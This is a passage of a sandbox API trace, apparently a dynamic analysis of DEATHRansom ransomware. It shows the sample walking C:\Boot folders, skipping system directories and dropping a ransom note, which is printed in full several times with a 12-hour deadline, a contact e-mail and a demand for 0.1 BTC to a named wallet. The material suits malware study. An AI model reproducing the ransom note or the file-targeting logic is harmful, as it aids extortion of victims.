ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.040] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.041] CloseHandle (hObject=0x7a8) returned 1 [0075.041] GetProcessHeap () returned 0x4f10000 [0075.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.041] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0075.041] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0075.041] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0075.041] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0075.041] StrStrW (lpFirst="pt-pt", lpSrch="programdata") returned 0x0 [0075.041] StrStrW (lpFirst="pt-pt", lpSrch="$recycle.bin") returned 0x0 [0075.041] StrStrW (lpFirst="pt-pt", lpSrch="program files") returned 0x0 [0075.041] StrStrW (lpFirst="pt-pt", lpSrch="windows") returned 0x0 [0075.041] StrStrW (lpFirst="pt-pt", lpSrch="all users") returned 0x0 [0075.041] StrStrW (lpFirst="pt-pt", lpSrch="appdata") returned 0x0 [0075.041] GetProcessHeap () returned 0x4f10000 [0075.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.041] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\pt-PT" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT") returned="\\\\?\\C:\\Boot\\pt-PT" [0075.041] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 19 [0075.041] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.042] GetProcessHeap () returned 0x4f10000 [0075.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.043] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\*") returned 19 [0075.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.043] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\.") returned 19 [0075.043] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.043] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.043] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.043] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\..") returned 20 [0075.043] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.043] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.043] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0075.043] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.043] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.043] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\read_me.txt") returned 29 [0075.043] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\read_me.txt" (normalized: "c:\\boot\\pt-pt\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.044] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.044] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.044] CloseHandle (hObject=0x7a8) returned 1 [0075.045] GetProcessHeap () returned 0x4f10000 [0075.045] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.045] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0075.045] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0075.045] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0075.045] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0075.045] StrStrW (lpFirst="ru-ru", lpSrch="programdata") returned 0x0 [0075.045] StrStrW (lpFirst="ru-ru", lpSrch="$recycle.bin") returned 0x0 [0075.045] StrStrW (lpFirst="ru-ru", lpSrch="program files") returned 0x0 [0075.045] StrStrW (lpFirst="ru-ru", lpSrch="windows") returned 0x0 [0075.045] StrStrW (lpFirst="ru-ru", lpSrch="all users") returned 0x0 [0075.045] StrStrW (lpFirst="ru-ru", lpSrch="appdata") returned 0x0 [0075.045] GetProcessHeap () returned 0x4f10000 [0075.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.045] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\ru-RU" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU") returned="\\\\?\\C:\\Boot\\ru-RU" [0075.045] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 20 [0075.045] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.046] GetProcessHeap () returned 0x4f10000 [0075.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.046] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\*") returned 19 [0075.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.046] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\.") returned 19 [0075.046] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.046] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.046] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.046] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\..") returned 20 [0075.046] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.046] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.046] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0075.046] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.047] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.047] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\read_me.txt") returned 29 [0075.047] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\read_me.txt" (normalized: "c:\\boot\\ru-ru\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.047] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.047] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.048] CloseHandle (hObject=0x7a8) returned 1 [0075.048] GetProcessHeap () returned 0x4f10000 [0075.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.048] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0075.048] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0075.048] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0075.048] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0075.048] StrStrW (lpFirst="sv-se", lpSrch="programdata") returned 0x0 [0075.048] StrStrW (lpFirst="sv-se", lpSrch="$recycle.bin") returned 0x0 [0075.048] StrStrW (lpFirst="sv-se", lpSrch="program files") returned 0x0 [0075.048] StrStrW (lpFirst="sv-se", lpSrch="windows") returned 0x0 [0075.048] StrStrW (lpFirst="sv-se", lpSrch="all users") returned 0x0 [0075.048] StrStrW (lpFirst="sv-se", lpSrch="appdata") returned 0x0 [0075.048] GetProcessHeap () returned 0x4f10000 [0075.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.048] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\sv-SE" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE") returned="\\\\?\\C:\\Boot\\sv-SE" [0075.048] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 21 [0075.048] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.049] GetProcessHeap () returned 0x4f10000 [0075.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0075.049] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\*") returned 19 [0075.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.050] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\.") returned 19 [0075.050] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.050] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.050] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\..") returned 20 [0075.050] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.050] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.050] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0075.050] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.050] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.050] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\read_me.txt") returned 29 [0075.050] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\read_me.txt" (normalized: "c:\\boot\\sv-se\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.051] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy 